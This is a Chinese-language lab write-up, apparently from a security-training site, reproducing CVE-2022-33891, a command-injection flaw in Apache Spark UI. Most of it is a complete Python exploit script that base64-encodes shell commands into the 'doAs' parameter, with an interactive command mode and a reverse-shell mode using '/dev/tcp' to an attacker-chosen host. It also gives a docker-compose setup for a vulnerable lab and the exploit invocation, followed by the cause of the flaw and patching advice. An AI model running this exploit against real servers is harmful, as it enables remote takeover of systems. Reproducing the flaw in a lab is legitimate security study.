简介
Spark 是用于大规模数据处理的统一分析引擎。它提供了 Scala、Java、Python 和 R 中的高级 API,以及支持用于数据分析的通用计算图的优化引擎。它还支持一组丰富的高级工具,包括用于 SQL 和 DataFrames 的 Spark SQL、用于 Pandas 工作负载的 Spark 上的 Pandas API、用于机器学习的 MLlib、用于图形处理的 GraphX 和用于流处理的结构化流。
影响版本
Apache spark version conf/spark-defaults.conf
</blockquote>POC如下:- #!/usr/bin/env python3
- import requests
- import argparse
- import base64
- import datetime
-
-
- parser = argparse.ArgumentParser(description='CVE-2022-33891 Python POC Exploit Script')
- parser.add_argument('-u', '--url', help='URL to exploit.', required=True)
- parser.add_argument('-p', '--port', help='Exploit target\'s port.', required=True)
- parser.add_argument('--revshell', default=False, action="store_true", help="Reverse Shell option.")
- parser.add_argument('-lh', '--listeninghost', help='Your listening host IP address.')
- parser.add_argument('-lp', '--listeningport', help='Your listening host port.')
- parser.add_argument('--check', default=False, action="store_true", help="Checks if the target is exploitable with a sleep test")
-
- args = parser.parse_args()
-
- full_url = f"{args.url}:{args.port}"
-
-
- def check_for_vuln(url):
- print("[*] Attempting to connect to site...")
- r = requests.get(f"{full_url}/?doAs='testing'", allow_redirects=False)
- if r.status_code != 403:
- print("[-] Does not look like an Apache Spark server.")
- quit(1)
- elif "org.apache.spark.ui" not in r.content.decode("utf-8"):
- print("[-] Does not look like an Apache Spark server.")
- quit(1)
- else:
- print("[*] Performing sleep test of 10 seconds...")
- t1 = datetime.datetime.now()
- run_cmd("sleep 10")
- t2 = datetime.datetime.now()
- delta = t2-t1
- if delta.seconds < 10:
- print("[-] Sleep was less than 10. This target is probably not vulnerable")
- else:
- print("[+] Sleep was 10 seconds! This target is probably vulnerable!")
- exit(0)
-
-
- def cmd_prompt():
- # Provide user with cmd prompt on loop to run commands
- cmd = input("> ")
- return cmd
-
-
- def base64_encode(cmd):
- message_bytes = cmd.encode('ascii')
- base64_bytes = base64.b64encode(message_bytes)
- base64_cmd = base64_bytes.decode('ascii')
- return base64_cmd
-
-
- def run_cmd(cmd):
- try:
- # Execute given command from cmd prompt
- #print("[*] Command is: " + cmd)
- base64_cmd = base64_encode(cmd)
- #print("[*] Base64 command is: " + base64_cmd)
- exploit = f"/?doAs=`echo {base64_cmd} | base64 -d | bash`"
- exploit_req = f"{full_url}{exploit}"
- print("[*] Full exploit request is: " + exploit_req)
- requests.get(exploit_req, allow_redirects=False)
- except Exception as e:
- print(str(e))
-
-
- def revshell(lhost, lport):
- print(f"[*] Reverse shell mode.\n[*] Set up your listener by entering the following:\n nc -nvlp {lport}")
- input("[!] When your listener is set up, press enter!")
- rev_shell_cmd = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
- run_cmd(rev_shell_cmd)
-
- def main():
-
- if args.check and args.revshell:
- print("[!] Please choose either revshell or check!")
- exit(1)
-
- elif args.check:
- check_for_vuln(full_url)
-
- # Revshell
- elif args.revshell:
- if not (args.listeninghost and args.listeningport):
- print("[x] You need a listeninghost and listening port!")
- exit(1)
- else:
- lhost = args.listeninghost
- lport = args.listeningport
- revshell(lhost, lport)
- else:
- # "Interactive" mode
- print("[*] "Interactive" mode!\n[!] Note: you will not receive any output from these commands. Try using something like ping or sleep to test for execution.")
- while True:
- command_to_run = cmd_prompt()
- run_cmd(command_to_run)
-
-
- if __name__ == "__main__":
- main()
复制代码
如果失败的话重建项目,使用下面这个文件起docker可能是镜像的问题,不同的仓库内的Apache spark配置不同,这个版本是V3.0.0的- version: '2'
-
- services:
-
- spark:
- image: docker.io/bitnami/spark:3.0.0
- environment:
- - SPARK_MODE=master
- - SPARK_RPC_AUTHENTICATION_ENABLED=no
- - SPARK_RPC_ENCRYPTION_ENABLED=no
- - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
- - SPARK_SSL_ENABLED=no
- ports:
- - '8080:8080'
复制代码
[img=720,136.0164271047228]https://www.hetianlab.com/headImg.action?news=d971d25d-d1f1-4476-8a05-09e2bd89a727.png[/img]
访问
http://192.168.0.112:8080/
[img=720,299.60877296976884]https://www.hetianlab.com/headImg.action?news=c41f1157-4801-4537-b2f8-35c966d4bba2.png[/img]
修改配置文件
docker exec -it 8a /bin/bash
I have no name!@8a7873e77c46:/opt/bitnami/spark$ echo "spark.acls.enable true" >> conf/spark-defaults.conf
I have no name!@8a7873e77c46:/opt/bitnami/spark$ cat conf/spark-defaults.conf
已追加配置,重启docker
root@ubuntu:/home/ubuntu/Desktop/spark# docker-compose up -d
使用poc去生成payload,或者手动也可,但是执行的命令要使用echo写入执行且做base64编码后解码生效。
[img=720,82.65306122448979]https://www.hetianlab.com/headImg.action?news=77b0c875-5fab-4d96-b325-75b9a79cb753.png[/img]
但是看不到回显,直接反弹shell- python 2.py -u http://192.168.0.112 -p 8080 --revshell -lh 192.168.0.121 -lp 4444
复制代码 [img=720,88.34724540901503]https://www.hetianlab.com/headImg.action?news=1800bfd7-32ae-465f-b24b-6fd8f18ebbe6.png[/img]
查看连接状态
漏洞成因
漏洞成因是由于Apache Spark UI 提供了通过配置选项 spark.acls.enable 启用 ACL 的可能性。使用身份验证过滤器,这将检查用户是否具有查看或修改应用程序的访问权限。如果启用了 ACL,则 HttpSecurityFilter 中的代码路径可以允许某人通过提供任意用户名来执行模拟。然后,恶意用户可能能够访问权限检查功能,该功能最终将根据他们的输入构建一个 Unix shell 命令并执行,导致任意 shell 命令执行。
参考:https://spark.apache.org/security.html
修复建议
1.建议升级到安全版本,参考官网链接:
https://spark.apache.org/downloads.html
2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
更多靶场实验练习、网安学习资料,请点击这里>>
搜索
复制
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |